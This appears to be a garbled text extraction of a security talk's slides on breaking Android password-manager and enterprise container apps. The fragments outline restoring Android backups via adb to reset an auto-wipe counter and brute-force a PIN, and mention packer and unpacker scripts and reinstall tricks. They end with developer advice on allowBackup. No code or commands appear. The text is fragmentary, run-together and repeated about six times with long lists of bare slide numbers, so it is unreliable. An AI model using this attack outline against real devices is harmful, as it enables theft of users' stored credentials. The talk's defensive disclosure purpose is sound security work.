hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253




REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232
